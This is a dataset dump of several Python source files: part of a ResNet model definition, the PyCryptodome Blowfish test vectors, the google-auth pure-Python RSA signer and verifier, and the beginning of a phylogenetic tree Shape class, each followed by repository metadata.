self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
ramp_up_lr = False
self.data_regime = None
def size_config(size): return mixsize_config(size, base_size=base_image_size, base_batch=base_device_batch, base_duplicates=base_duplicates,
adapt_batch=mix_size_regime == 'B+', adapt_duplicates=mix_size_regime == 'D+')
increment = int(base_image_size / 7)
if '144' in regime:
self.sampled_data_regime = [
(0.1, size_config(base_image_size+increment)),
(0.1, size_config(base_image_size)),
(0.6, size_config(base_image_size - 3*increment)),
(0.2, size_config(base_image_size - 4*increment)),
]
            else:
                self.sampled_data_regime = [
(0.8/6, size_config(base_image_size - 3*increment)),
(0.8/6, size_config(base_image_size - 2*increment)),
(0.8/6, size_config(base_image_size - increment)),
(0.2, size_config(base_image_size)),
(0.8/6, size_config(base_image_size + increment)),
(0.8/6, size_config(base_image_size + 2*increment)),
(0.8/6, size_config(base_image_size + 3*increment)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': base_image_size}
]
        if ramp_up_lr and scale_lr > 1:
            self.regime[0]['step_lambda'] = ramp_up_fn(0.1, 0.1 * scale_lr,
num_steps_epoch * 5)
self.regime.insert(1, {'epoch': 5, 'lr': scale_lr * 1e-1})
class ResNet_cifar(ResNet):
def __init__(self, num_classes=10, inplanes=16,
block=BasicBlock, depth=18, width=[16, 32, 64],
groups=[1, 1, 1], residual_block=None, regime='normal', dropout=None, mixup=False):
super(ResNet_cifar, self).__init__()
self.inplanes = inplanes
n = int((depth - 2) / 6)
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = lambda x: x
self.layer1 = self._make_layer(block, width[0], n, groups=groups[0],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer2 = self._make_layer(block, width[1], n, stride=2, groups=groups[1],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer3 = self._make_layer(block, width[2], n, stride=2, groups=groups[2],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer4 = lambda x: x
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1], num_classes)
init_model(self)
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(1e-4)},
{'epoch': 81, 'lr': 1e-2},
{'epoch': 122, 'lr': 1e-3},
{'epoch': 164, 'lr': 1e-4}
]
if 'wide-resnet' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(5e-4)},
{'epoch': 60, 'lr': 2e-2},
{'epoch': 120, 'lr': 4e-3},
{'epoch': 160, 'lr': 8e-4}
]
if 'sampled' in regime:
adapt_batch = True if 'B+' in regime else False
adapt_duplicates = True if ('D+' in regime or not adapt_batch) \
else False
def size_config(size): return mixsize_config(size, base_size=32, base_batch=64, base_duplicates=1,
adapt_batch=adapt_batch, adapt_duplicates=adapt_duplicates)
self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
self.data_regime = None
self.sampled_data_regime = [
(0.3, size_config(32)),
(0.2, size_config(48)),
(0.3, size_config(24)),
(0.2, size_config(16)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': 32, 'scale_size': 32}
]
def resnet(**config):
dataset = config.pop('dataset', 'imagenet')
if config.pop('quantize', False):
from .modules.quantize import QConv2d, QLinear, RangeBN
torch.nn.Linear = QLinear
torch.nn.Conv2d = QConv2d
torch.nn.BatchNorm2d = RangeBN
bn_norm = config.pop('bn_norm', None)
if bn_norm is not None:
from .modules.lp_norm import L1BatchNorm2d, TopkBatchNorm2d
if bn_norm == 'L1':
torch.nn.BatchNorm2d = L1BatchNorm2d
if bn_norm == 'TopK':
torch.nn.BatchNorm2d = TopkBatchNorm2d
if 'imagenet' in dataset:
config.setdefault('num_classes', 1000)
depth = config.pop('depth', 50)
if depth == 18:
config.update(dict(block=BasicBlock,
layers=[2, 2, 2, 2],
expansion=1))
if depth == 34:
config.update(dict(block=BasicBlock,
layers=[3, 4, 6, 3],
expansion=1))
if depth == 50:
config.update(dict(block=Bottleneck, layers=[3, 4, 6, 3]))
if depth == 101:
config.update(dict(block=Bottleneck, layers=[3, 4, 23, 3]))
if depth == 152:
config.update(dict(block=Bottleneck, layers=[3, 8, 36, 3]))
if depth == 200:
config.update(dict(block=Bottleneck, layers=[3, 24, 36, 3]))
return ResNet_imagenet(**config)
elif dataset == 'cifar10':
config.setdefault('num_classes', 10)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
elif dataset == 'cifar100':
config.setdefault('num_classes', 100)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
def resnet_se(**config):
config['residual_block'] = SEBlock
return resnet(**config)
| true | true |
1c4a9d5d339e6b97fd46492825604da475aeac37 | 6,136 | py | Python | lib/lib/Cryptodome/SelfTest/Cipher/test_Blowfish.py | Zhangxi-Lam/alfred-google-keep | 9f8f891e103f33a7e749907fe5cbfcf779131c8e | [
"MIT"
] | 2,557 | 2016-07-19T22:20:45.000Z | 2022-01-25T10:53:35.000Z | lib/lib/Cryptodome/SelfTest/Cipher/test_Blowfish.py | Zhangxi-Lam/alfred-google-keep | 9f8f891e103f33a7e749907fe5cbfcf779131c8e | [
"MIT"
] | 1,360 | 2016-07-20T02:06:42.000Z | 2021-07-27T12:46:40.000Z | lib/lib/Cryptodome/SelfTest/Cipher/test_Blowfish.py | Zhangxi-Lam/alfred-google-keep | 9f8f891e103f33a7e749907fe5cbfcf779131c8e | [
"MIT"
] | 607 | 2016-07-20T03:34:04.000Z | 2022-01-05T14:57:09.000Z | # -*- coding: utf-8 -*-
#
# SelfTest/Cipher/test_Blowfish.py: Self-test for the Blowfish cipher
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Cryptodome.Cipher.Blowfish"""
import unittest
from Cryptodome.Util.py3compat import bchr
from Cryptodome.Cipher import Blowfish
# This is a list of (plaintext, ciphertext, key) tuples.
test_data = [
# Test vectors from http://www.schneier.com/code/vectors.txt
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('ffffffffffffffff', '51866fd5b85ecb8a', 'ffffffffffffffff'),
('1000000000000001', '7d856f9a613063f2', '3000000000000000'),
('1111111111111111', '2466dd878b963c9d', '1111111111111111'),
('1111111111111111', '61f9c3802281b096', '0123456789abcdef'),
('0123456789abcdef', '7d0cc630afda1ec7', '1111111111111111'),
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('0123456789abcdef', '0aceab0fc6a0a28d', 'fedcba9876543210'),
('01a1d6d039776742', '59c68245eb05282b', '7ca110454a1a6e57'),
('5cd54ca83def57da', 'b1b8cc0b250f09a0', '0131d9619dc1376e'),
('0248d43806f67172', '1730e5778bea1da4', '07a1133e4a0b2686'),
('51454b582ddf440a', 'a25e7856cf2651eb', '3849674c2602319e'),
('42fd443059577fa2', '353882b109ce8f1a', '04b915ba43feb5b6'),
('059b5e0851cf143a', '48f4d0884c379918', '0113b970fd34f2ce'),
('0756d8e0774761d2', '432193b78951fc98', '0170f175468fb5e6'),
('762514b829bf486a', '13f04154d69d1ae5', '43297fad38e373fe'),
('3bdd119049372802', '2eedda93ffd39c79', '07a7137045da2a16'),
('26955f6835af609a', 'd887e0393c2da6e3', '04689104c2fd3b2f'),
('164d5e404f275232', '5f99d04f5b163969', '37d06bb516cb7546'),
('6b056e18759f5cca', '4a057a3b24d3977b', '1f08260d1ac2465e'),
('004bd6ef09176062', '452031c1e4fada8e', '584023641aba6176'),
('480d39006ee762f2', '7555ae39f59b87bd', '025816164629b007'),
('437540c8698f3cfa', '53c55f9cb49fc019', '49793ebc79b3258f'),
('072d43a077075292', '7a8e7bfa937e89a3', '4fb05e1515ab73a7'),
('02fe55778117f12a', 'cf9c5d7a4986adb5', '49e95d6d4ca229bf'),
('1d9d5c5018f728c2', 'd1abb290658bc778', '018310dc409b26d6'),
('305532286d6f295a', '55cb3774d13ef201', '1c587f1c13924fef'),
('0123456789abcdef', 'fa34ec4847b268b2', '0101010101010101'),
('0123456789abcdef', 'a790795108ea3cae', '1f1f1f1f0e0e0e0e'),
('0123456789abcdef', 'c39e072d9fac631d', 'e0fee0fef1fef1fe'),
('ffffffffffffffff', '014933e0cdaff6e4', '0000000000000000'),
('0000000000000000', 'f21e9a77b71c49bc', 'ffffffffffffffff'),
('0000000000000000', '245946885754369a', '0123456789abcdef'),
('ffffffffffffffff', '6b5c5a9c5d9e0a5a', 'fedcba9876543210'),
#('fedcba9876543210', 'f9ad597c49db005e', 'f0'),
#('fedcba9876543210', 'e91d21c1d961a6d6', 'f0e1'),
#('fedcba9876543210', 'e9c2b70a1bc65cf3', 'f0e1d2'),
#('fedcba9876543210', 'be1e639408640f05', 'f0e1d2c3'),
('fedcba9876543210', 'b39e44481bdb1e6e', 'f0e1d2c3b4'),
('fedcba9876543210', '9457aa83b1928c0d', 'f0e1d2c3b4a5'),
('fedcba9876543210', '8bb77032f960629d', 'f0e1d2c3b4a596'),
('fedcba9876543210', 'e87a244e2cc85e82', 'f0e1d2c3b4a59687'),
('fedcba9876543210', '15750e7a4f4ec577', 'f0e1d2c3b4a5968778'),
('fedcba9876543210', '122ba70b3ab64ae0', 'f0e1d2c3b4a596877869'),
('fedcba9876543210', '3a833c9affc537f6', 'f0e1d2c3b4a5968778695a'),
('fedcba9876543210', '9409da87a90f6bf2', 'f0e1d2c3b4a5968778695a4b'),
('fedcba9876543210', '884f80625060b8b4', 'f0e1d2c3b4a5968778695a4b3c'),
('fedcba9876543210', '1f85031c19e11968', 'f0e1d2c3b4a5968778695a4b3c2d'),
('fedcba9876543210', '79d9373a714ca34f', 'f0e1d2c3b4a5968778695a4b3c2d1e'),
('fedcba9876543210', '93142887ee3be15c',
'f0e1d2c3b4a5968778695a4b3c2d1e0f'),
('fedcba9876543210', '03429e838ce2d14b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00'),
('fedcba9876543210', 'a4299e27469ff67b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011'),
('fedcba9876543210', 'afd5aed1c1bc96a8',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122'),
('fedcba9876543210', '10851c0e3858da9f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233'),
('fedcba9876543210', 'e6f51ed79b9db21f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344'),
('fedcba9876543210', '64a6e14afd36b46f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122334455'),
('fedcba9876543210', '80c7d7d45a5479ad',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233445566'),
('fedcba9876543210', '05044b62fa52d080',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344556677'),
]
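# Illustrative sketch, not part of the original suite: each tuple above can
# be replayed with a one-block ECB round trip, assuming PyCryptodome is
# installed. The helper name is invented and the function is left uncalled
# so importing this module stays side-effect free.
def _demo_check_first_vector():
    from binascii import unhexlify, hexlify
    plaintext, ciphertext, key = test_data[0]
    cipher = Blowfish.new(unhexlify(key), Blowfish.MODE_ECB)
    # Encrypting the plaintext block must reproduce the recorded ciphertext.
    assert hexlify(cipher.encrypt(unhexlify(plaintext))) == ciphertext.encode()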
class KeyLength(unittest.TestCase):
def runTest(self):
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 4,
Blowfish.MODE_ECB)
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 57,
Blowfish.MODE_ECB)
def get_tests(config={}):
from common import make_block_tests
tests = make_block_tests(Blowfish, "Blowfish", test_data)
tests.append(KeyLength())
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
| 49.088 | 79 | 0.71105 |
import unittest
from Cryptodome.Util.py3compat import bchr
from Cryptodome.Cipher import Blowfish
test_data = [
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('ffffffffffffffff', '51866fd5b85ecb8a', 'ffffffffffffffff'),
('1000000000000001', '7d856f9a613063f2', '3000000000000000'),
('1111111111111111', '2466dd878b963c9d', '1111111111111111'),
('1111111111111111', '61f9c3802281b096', '0123456789abcdef'),
('0123456789abcdef', '7d0cc630afda1ec7', '1111111111111111'),
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('0123456789abcdef', '0aceab0fc6a0a28d', 'fedcba9876543210'),
('01a1d6d039776742', '59c68245eb05282b', '7ca110454a1a6e57'),
('5cd54ca83def57da', 'b1b8cc0b250f09a0', '0131d9619dc1376e'),
('0248d43806f67172', '1730e5778bea1da4', '07a1133e4a0b2686'),
('51454b582ddf440a', 'a25e7856cf2651eb', '3849674c2602319e'),
('42fd443059577fa2', '353882b109ce8f1a', '04b915ba43feb5b6'),
('059b5e0851cf143a', '48f4d0884c379918', '0113b970fd34f2ce'),
('0756d8e0774761d2', '432193b78951fc98', '0170f175468fb5e6'),
('762514b829bf486a', '13f04154d69d1ae5', '43297fad38e373fe'),
('3bdd119049372802', '2eedda93ffd39c79', '07a7137045da2a16'),
('26955f6835af609a', 'd887e0393c2da6e3', '04689104c2fd3b2f'),
('164d5e404f275232', '5f99d04f5b163969', '37d06bb516cb7546'),
('6b056e18759f5cca', '4a057a3b24d3977b', '1f08260d1ac2465e'),
('004bd6ef09176062', '452031c1e4fada8e', '584023641aba6176'),
('480d39006ee762f2', '7555ae39f59b87bd', '025816164629b007'),
('437540c8698f3cfa', '53c55f9cb49fc019', '49793ebc79b3258f'),
('072d43a077075292', '7a8e7bfa937e89a3', '4fb05e1515ab73a7'),
('02fe55778117f12a', 'cf9c5d7a4986adb5', '49e95d6d4ca229bf'),
('1d9d5c5018f728c2', 'd1abb290658bc778', '018310dc409b26d6'),
('305532286d6f295a', '55cb3774d13ef201', '1c587f1c13924fef'),
('0123456789abcdef', 'fa34ec4847b268b2', '0101010101010101'),
('0123456789abcdef', 'a790795108ea3cae', '1f1f1f1f0e0e0e0e'),
('0123456789abcdef', 'c39e072d9fac631d', 'e0fee0fef1fef1fe'),
('ffffffffffffffff', '014933e0cdaff6e4', '0000000000000000'),
('0000000000000000', 'f21e9a77b71c49bc', 'ffffffffffffffff'),
('0000000000000000', '245946885754369a', '0123456789abcdef'),
('ffffffffffffffff', '6b5c5a9c5d9e0a5a', 'fedcba9876543210'),
('fedcba9876543210', 'b39e44481bdb1e6e', 'f0e1d2c3b4'),
('fedcba9876543210', '9457aa83b1928c0d', 'f0e1d2c3b4a5'),
('fedcba9876543210', '8bb77032f960629d', 'f0e1d2c3b4a596'),
('fedcba9876543210', 'e87a244e2cc85e82', 'f0e1d2c3b4a59687'),
('fedcba9876543210', '15750e7a4f4ec577', 'f0e1d2c3b4a5968778'),
('fedcba9876543210', '122ba70b3ab64ae0', 'f0e1d2c3b4a596877869'),
('fedcba9876543210', '3a833c9affc537f6', 'f0e1d2c3b4a5968778695a'),
('fedcba9876543210', '9409da87a90f6bf2', 'f0e1d2c3b4a5968778695a4b'),
('fedcba9876543210', '884f80625060b8b4', 'f0e1d2c3b4a5968778695a4b3c'),
('fedcba9876543210', '1f85031c19e11968', 'f0e1d2c3b4a5968778695a4b3c2d'),
('fedcba9876543210', '79d9373a714ca34f', 'f0e1d2c3b4a5968778695a4b3c2d1e'),
('fedcba9876543210', '93142887ee3be15c',
'f0e1d2c3b4a5968778695a4b3c2d1e0f'),
('fedcba9876543210', '03429e838ce2d14b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00'),
('fedcba9876543210', 'a4299e27469ff67b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011'),
('fedcba9876543210', 'afd5aed1c1bc96a8',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122'),
('fedcba9876543210', '10851c0e3858da9f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233'),
('fedcba9876543210', 'e6f51ed79b9db21f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344'),
('fedcba9876543210', '64a6e14afd36b46f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122334455'),
('fedcba9876543210', '80c7d7d45a5479ad',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233445566'),
('fedcba9876543210', '05044b62fa52d080',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344556677'),
]
class KeyLength(unittest.TestCase):
def runTest(self):
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 4,
Blowfish.MODE_ECB)
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 57,
Blowfish.MODE_ECB)
def get_tests(config={}):
from common import make_block_tests
tests = make_block_tests(Blowfish, "Blowfish", test_data)
tests.append(KeyLength())
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
| true | true |
1c4a9dab8a4dee81d5f84fa57fcef0380cf1a15a | 5,951 | py | Python | google/auth/crypt/_python_rsa.py | renovate-bot/google-auth-library-python | a4cf9b1bf461a3fb35432e42f4d8bc1a8ff7bc97 | [
"Apache-2.0"
] | 4 | 2021-10-20T12:39:09.000Z | 2022-02-26T15:02:08.000Z | google/auth/crypt/_python_rsa.py | renovate-bot/google-auth-library-python | a4cf9b1bf461a3fb35432e42f4d8bc1a8ff7bc97 | [
"Apache-2.0"
] | null | null | null | google/auth/crypt/_python_rsa.py | renovate-bot/google-auth-library-python | a4cf9b1bf461a3fb35432e42f4d8bc1a8ff7bc97 | [
"Apache-2.0"
] | 1 | 2021-10-20T13:47:10.000Z | 2021-10-20T13:47:10.000Z |
# Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pure-Python RSA cryptography implementation.
Uses the ``rsa``, ``pyasn1`` and ``pyasn1_modules`` packages
to parse PEM files storing PKCS#1 or PKCS#8 keys as well as
certificates. There is no support for p12 files.
"""
from __future__ import absolute_import
import io
from pyasn1.codec.der import decoder
from pyasn1_modules import pem
from pyasn1_modules.rfc2459 import Certificate
from pyasn1_modules.rfc5208 import PrivateKeyInfo
import rsa
from google.auth import _helpers
from google.auth.crypt import base
_POW2 = (128, 64, 32, 16, 8, 4, 2, 1)
_CERTIFICATE_MARKER = b"-----BEGIN CERTIFICATE-----"
_PKCS1_MARKER = ("-----BEGIN RSA PRIVATE KEY-----", "-----END RSA PRIVATE KEY-----")
_PKCS8_MARKER = ("-----BEGIN PRIVATE KEY-----", "-----END PRIVATE KEY-----")
_PKCS8_SPEC = PrivateKeyInfo()
def _bit_list_to_bytes(bit_list):
"""Converts an iterable of 1s and 0s to bytes.
Combines the list 8 at a time, treating each group of 8 bits
as a single byte.
Args:
bit_list (Sequence): Sequence of 1s and 0s.
Returns:
bytes: The decoded bytes.
"""
num_bits = len(bit_list)
byte_vals = bytearray()
for start in range(0, num_bits, 8):
curr_bits = bit_list[start : start + 8]
char_val = sum(val * digit for val, digit in zip(_POW2, curr_bits))
byte_vals.append(char_val)
return bytes(byte_vals)
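# Illustrative sketch, not in the original module: the big-endian packing
# performed by _bit_list_to_bytes on a single byte. The helper name and the
# example value are invented for illustration; left uncalled.
def _demo_bit_list_to_bytes():
    # Bits 1,0,1,0,0,1,0,1 weighted by _POW2 give 128 + 32 + 4 + 1 = 0xA5.
    assert _bit_list_to_bytes([1, 0, 1, 0, 0, 1, 0, 1]) == b"\xa5"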
class RSAVerifier(base.Verifier):
"""Verifies RSA cryptographic signatures using public keys.
Args:
public_key (rsa.key.PublicKey): The public key used to verify
signatures.
"""
def __init__(self, public_key):
self._pubkey = public_key
@_helpers.copy_docstring(base.Verifier)
def verify(self, message, signature):
message = _helpers.to_bytes(message)
try:
return rsa.pkcs1.verify(message, signature, self._pubkey)
except (ValueError, rsa.pkcs1.VerificationError):
return False
@classmethod
def from_string(cls, public_key):
"""Construct an Verifier instance from a public key or public
certificate string.
Args:
public_key (Union[str, bytes]): The public key in PEM format or the
x509 public key certificate.
Returns:
google.auth.crypt._python_rsa.RSAVerifier: The constructed verifier.
Raises:
ValueError: If the public_key can't be parsed.
"""
public_key = _helpers.to_bytes(public_key)
is_x509_cert = _CERTIFICATE_MARKER in public_key
# If this is a certificate, extract the public key info.
if is_x509_cert:
der = rsa.pem.load_pem(public_key, "CERTIFICATE")
asn1_cert, remaining = decoder.decode(der, asn1Spec=Certificate())
if remaining != b"":
raise ValueError("Unused bytes", remaining)
cert_info = asn1_cert["tbsCertificate"]["subjectPublicKeyInfo"]
key_bytes = _bit_list_to_bytes(cert_info["subjectPublicKey"])
pubkey = rsa.PublicKey.load_pkcs1(key_bytes, "DER")
else:
pubkey = rsa.PublicKey.load_pkcs1(public_key, "PEM")
return cls(pubkey)
class RSASigner(base.Signer, base.FromServiceAccountMixin):
"""Signs messages with an RSA private key.
Args:
private_key (rsa.key.PrivateKey): The private key to sign with.
key_id (str): Optional key ID used to identify this private key. This
can be useful to associate the private key with its associated
public key or certificate.
"""
def __init__(self, private_key, key_id=None):
self._key = private_key
self._key_id = key_id
@property
@_helpers.copy_docstring(base.Signer)
def key_id(self):
return self._key_id
@_helpers.copy_docstring(base.Signer)
def sign(self, message):
message = _helpers.to_bytes(message)
return rsa.pkcs1.sign(message, self._key, "SHA-256")
@classmethod
def from_string(cls, key, key_id=None):
"""Construct an Signer instance from a private key in PEM format.
Args:
key (str): Private key in PEM format.
key_id (str): An optional key id used to identify the private key.
Returns:
google.auth.crypt.Signer: The constructed signer.
Raises:
ValueError: If the key cannot be parsed as PKCS#1 or PKCS#8 in
PEM format.
"""
key = _helpers.from_bytes(key) # PEM expects str in Python 3
marker_id, key_bytes = pem.readPemBlocksFromFile(
io.StringIO(key), _PKCS1_MARKER, _PKCS8_MARKER
)
# Key is in pkcs1 format.
if marker_id == 0:
private_key = rsa.key.PrivateKey.load_pkcs1(key_bytes, format="DER")
# Key is in pkcs8.
elif marker_id == 1:
key_info, remaining = decoder.decode(key_bytes, asn1Spec=_PKCS8_SPEC)
if remaining != b"":
raise ValueError("Unused bytes", remaining)
private_key_info = key_info.getComponentByName("privateKey")
private_key = rsa.key.PrivateKey.load_pkcs1(
private_key_info.asOctets(), format="DER"
)
else:
raise ValueError("No key could be detected.")
return cls(private_key, key_id=key_id)
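# Illustrative sketch, not part of google-auth: wiring RSASigner and
# RSAVerifier together for a sign/verify round trip. The PEM arguments are
# placeholders the caller must supply; the helper is invented and uncalled.
def _demo_sign_and_verify(pem_private_key, pem_public_key):
    signer = RSASigner.from_string(pem_private_key)
    signature = signer.sign(b"a test message")
    verifier = RSAVerifier.from_string(pem_public_key)
    # verify() returns False (rather than raising) on a bad signature.
    assert verifier.verify(b"a test message", signature)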
| 34.005714 | 84 | 0.65384 |
from __future__ import absolute_import
import io
from pyasn1.codec.der import decoder
from pyasn1_modules import pem
from pyasn1_modules.rfc2459 import Certificate
from pyasn1_modules.rfc5208 import PrivateKeyInfo
import rsa
from google.auth import _helpers
from google.auth.crypt import base
_POW2 = (128, 64, 32, 16, 8, 4, 2, 1)
_CERTIFICATE_MARKER = b"-----BEGIN CERTIFICATE-----"
_PKCS1_MARKER = ("-----BEGIN RSA PRIVATE KEY-----", "-----END RSA PRIVATE KEY-----")
_PKCS8_MARKER = ("-----BEGIN PRIVATE KEY-----", "-----END PRIVATE KEY-----")
_PKCS8_SPEC = PrivateKeyInfo()
def _bit_list_to_bytes(bit_list):
num_bits = len(bit_list)
byte_vals = bytearray()
for start in range(0, num_bits, 8):
curr_bits = bit_list[start : start + 8]
char_val = sum(val * digit for val, digit in zip(_POW2, curr_bits))
byte_vals.append(char_val)
return bytes(byte_vals)
class RSAVerifier(base.Verifier):
def __init__(self, public_key):
self._pubkey = public_key
@_helpers.copy_docstring(base.Verifier)
def verify(self, message, signature):
message = _helpers.to_bytes(message)
try:
return rsa.pkcs1.verify(message, signature, self._pubkey)
except (ValueError, rsa.pkcs1.VerificationError):
return False
@classmethod
def from_string(cls, public_key):
public_key = _helpers.to_bytes(public_key)
is_x509_cert = _CERTIFICATE_MARKER in public_key
if is_x509_cert:
der = rsa.pem.load_pem(public_key, "CERTIFICATE")
asn1_cert, remaining = decoder.decode(der, asn1Spec=Certificate())
if remaining != b"":
raise ValueError("Unused bytes", remaining)
cert_info = asn1_cert["tbsCertificate"]["subjectPublicKeyInfo"]
key_bytes = _bit_list_to_bytes(cert_info["subjectPublicKey"])
pubkey = rsa.PublicKey.load_pkcs1(key_bytes, "DER")
else:
pubkey = rsa.PublicKey.load_pkcs1(public_key, "PEM")
return cls(pubkey)
class RSASigner(base.Signer, base.FromServiceAccountMixin):
def __init__(self, private_key, key_id=None):
self._key = private_key
self._key_id = key_id
@property
@_helpers.copy_docstring(base.Signer)
def key_id(self):
return self._key_id
@_helpers.copy_docstring(base.Signer)
def sign(self, message):
message = _helpers.to_bytes(message)
return rsa.pkcs1.sign(message, self._key, "SHA-256")
@classmethod
def from_string(cls, key, key_id=None):
        key = _helpers.from_bytes(key)
        marker_id, key_bytes = pem.readPemBlocksFromFile(
io.StringIO(key), _PKCS1_MARKER, _PKCS8_MARKER
)
if marker_id == 0:
private_key = rsa.key.PrivateKey.load_pkcs1(key_bytes, format="DER")
elif marker_id == 1:
key_info, remaining = decoder.decode(key_bytes, asn1Spec=_PKCS8_SPEC)
if remaining != b"":
raise ValueError("Unused bytes", remaining)
private_key_info = key_info.getComponentByName("privateKey")
private_key = rsa.key.PrivateKey.load_pkcs1(
private_key_info.asOctets(), format="DER"
)
else:
raise ValueError("No key could be detected.")
return cls(private_key, key_id=key_id)
| true | true |
1c4a9db4d968f272c0318dc71a033cc4af40f6ef | 6,241 | py | Python | biotrees/shape/__init__.py | bielr/biotrees | dc588888cec557d9522fc6faaa560488a95c946d | [
"Apache-2.0"
] | null | null | null | biotrees/shape/__init__.py | bielr/biotrees | dc588888cec557d9522fc6faaa560488a95c946d | [
"Apache-2.0"
] | null | null | null | biotrees/shape/__init__.py | bielr/biotrees | dc588888cec557d9522fc6faaa560488a95c946d | [
"Apache-2.0"
] | null | null | null |
from biotrees.util import iter_merge, skip_nth
"""
A `Shape` represents a topological tree. The data structure implemented here is of recursive type: a `Shape` can be
either a leaf or a list of `Shape` objects. Leaves are not distinguishable, but we know that they are leaves.
We choose a sorted shape to be the class representative of all shapes isomorphic to it.
"""
__all__ = ['Shape']
class Shape(object):
LEAF = None # filled in after class def
CHERRY = None # filled in after class def
"""
A `Shape` instance is either a leaf or a list of `Shape` instances that hang from a root.
"""
def __init__(self, children=None):
"""
Create a new `Shape` object.
The boolean is_leaf is True if the object is a leaf; it is False otherwise.
:param children: `list` instance.
:return: `Shape` instance.
"""
assert children is None or len(children) > 0
self.children = children
def is_leaf(self):
return self.children is None
def clone(self):
"""
Returns `Shape` instance which is exactly the same as self.
:return: `Shape` instance.
"""
if self.is_leaf():
return Shape.LEAF
else:
return Shape([ch.clone() for ch in self.children])
def _is_sorted(self):
if self.is_leaf():
return True
children = self.children
return all(ch._is_sorted() for ch in children) and \
all(ch1 <= ch2 for ch1, ch2 in zip(children[:-1], children[1:]))
def _sort(self):
"""
Sorts self using lexicographical order.
"""
if self.is_leaf():
return
for t in self.children:
t._sort()
self.children.sort()
def compare(self, t2):
"""
        Compare self with another `Shape` object. We use lexicographical order to compare two `Shape` instances.
        Leaves in this case are indistinguishable. It returns an int c, which is 0 if self and T2 are equal, < 0 if
self < T2, and > 0 if self > T2.
:param t2: `Shape` instance.
:return: `int` instance.
"""
if self.is_leaf() and t2.is_leaf():
return 0
elif self.is_leaf():
return -1
elif t2.is_leaf():
return 1
else:
c = len(self.children) - len(t2.children)
if c != 0:
return c
for t1, t2 in zip(self.children, t2.children):
c = t1.compare(t2)
if c != 0:
return c
return c
def __lt__(self, t2):
"""
Uses the comparing method above to decide if self is less than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) < 0
def __le__(self, t2):
"""
Uses the comparing method above to decide if self is less or equal than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) <= 0
def __eq__(self, t2):
"""
Uses the comparing method above to decide if self is equal to T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) == 0
def __ne__(self, t2):
"""
Uses the comparing method above to decide if self is not equal to T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
